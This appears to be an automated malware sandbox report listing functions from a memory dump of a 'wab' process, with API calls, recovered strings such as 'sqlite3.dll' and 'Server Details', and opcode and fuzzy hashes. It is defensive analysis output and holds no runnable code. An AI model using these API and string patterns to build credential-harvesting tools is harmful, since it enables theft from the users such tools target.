                                          • API String ID: 1439213657-721921413
                                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                          Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00406640
                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                          • memcmp.MSVCRT ref: 00406672
                                          • memcpy.MSVCRT ref: 00406695
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset$memcmp
                                          • String ID: Ul@
                                          • API String ID: 270934217-715280498
                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                          Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                          • sprintf.MSVCRT ref: 0040B929
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                          • sprintf.MSVCRT ref: 0040B953
                                          • _mbscat.MSVCRT ref: 0040B966
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                          • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                          • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                          • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                          Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                          • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                          Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                          Strings
                                          • recovered %d pages from %s, xrefs: 004188B4
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                          • String ID: recovered %d pages from %s
                                          • API String ID: 985450955-1623757624
                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                          Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _ultoasprintf
                                          • String ID: %s %s %s
                                          • API String ID: 432394123-3850900253
                                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                          Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00409919
                                          • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: N\@
                                          • API String ID: 568519121-3851889168
                                          • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                          • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                          • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                          • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                          Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                          • sprintf.MSVCRT ref: 0040909B
                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                          • String ID: menu_%d
                                          • API String ID: 1129539653-2417748251
                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                          Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • failed memory resize %u to %u bytes, xrefs: 00411706
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _msizerealloc
                                          • String ID: failed memory resize %u to %u bytes
                                          • API String ID: 2713192863-2134078882
                                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                          Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                          • strrchr.MSVCRT ref: 00409808
                                          • _mbscat.MSVCRT ref: 0040981D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                          • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                          Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          • _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                          • _mbscat.MSVCRT ref: 004070FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscat$_mbscpystrlen
                                          • String ID: sqlite3.dll
                                          • API String ID: 1983510840-1155512374
                                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                          Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID: A4@$Server Details
                                          • API String ID: 1096422788-4071850762
                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                          Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                          • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                          • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                          • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                          Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                          • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                          Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8